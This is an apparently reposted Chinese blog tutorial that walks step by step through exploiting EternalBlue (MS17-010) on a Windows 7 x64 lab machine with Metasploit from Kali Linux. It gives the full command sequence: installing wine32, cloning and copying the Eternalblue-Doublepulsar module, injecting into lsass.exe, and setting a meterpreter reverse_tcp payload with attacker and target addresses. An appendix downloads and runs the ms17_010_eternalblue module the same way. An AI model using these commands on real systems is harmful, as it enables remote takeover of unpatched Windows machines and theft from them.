kali linux安装wine32,永恒之蓝msf下 ms17_010 (64位kali下安装wine32)
本次用到的環(huán)境:
kali(2016.2)32位系統(tǒng).ip地址:192.168.1.104
目標靶機為:win7sp1x64系統(tǒng)(關(guān)閉防火墻),ip地址:192.168.1.105
=================================
若kali為64位
windows為32
需要安裝wine32 ,但64位的kali下無法apt-get install wine32
在執(zhí)行exploit時會出現(xiàn) :
it looks like wine32 is missing, you should install it.
multiarch needs to be enabled first. as root, please
execute "dpkg --add-architecture i386 && apt-get update &&
apt-get install wine32"
按照上面的方法dpkg --add-architecture i386 && apt-get update &&
apt-get install wine32即可
=================================
具體的步驟如下:
kali系統(tǒng)下安裝wine32:
apt-get install wine32
用wine32執(zhí)行cmd.exe
wine cmd.exe
exit //退出
git? clone下載其利用腳本:
git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit
然后將腳本拷貝到?/usr/share/metasploit-framework/modules/exploits/windows/smb
cd Eternalblue-Doublepulsar-Metasploit/
cp -r deps/ eternalblue_doublepulsar.rb /usr/share/metasploit-framework/modules/exploits/windows/smb
啟動msf,然后進行一系列設(shè)置:
service postgresql start
msfconsole
search eternalblue
use exploit/windows/smb/eternalblue_doublepulsar
set DOUBLEPULSARPATH /usr/share/metasploit-framework/modules/exploits/windows/smb/deps
set ETERNALBLUEPATH /usr/share/metasploit-framework/modules/exploits/windows/smb/deps
set PROCESSINJECT lsass.exe
set TARGETARCHITECTURE x64
set rhost 192.168.1.105
show targets
set target 9
set payload windows/x64/meterpreter/reverse_tcp
show options
set lhost 192.168.1.104
exploit
附錄:
msf下的ms17-010模塊:
前提條件:
1. gem install ruby_smb #ruby_smb模塊安裝
2.msfupdate ? #msf的更新
3.msfconsole -qx "use exploit/windows/smb/ms17_010_eternalblue" ?#啟動并加載模塊
root@backlion:/opt# wget https://raw.githubusercontent.com/backlion/metasploit-framework/master/modules/exploits/windows/smb/ms17_010_eternalblue.rb
root@backlion:/opt# cp ms17_010_eternalblue.rb /usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue.rb
Use exploit/windows/smb/ms17_010_eternalblue
msf exploit(ms17_010_eternalblue) >set rhost 192.168.1.8
msf exploit(ms17_010_eternalblue) >set lhost 192.168.1.21
msf exploit(ms17_010_eternalblue) >set payload windows/x64/meterpreter/reverse_tcp
msf exploit(ms17_010_eternalblue) >exploit
Meterpreter> sysinfo
轉(zhuǎn)載:https://www.cnblogs.com/backlion/p/6804863.html
總結(jié)
以上是生活随笔為你收集整理的kali linux安装wine32,永恒之蓝msf下 ms17_010 (64位kali下安装wine32)的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
 
                            
                        - 上一篇: 求一个关于杨颖的个性签名
- 下一篇: 老鼠娶亲年画是谁画的啊?
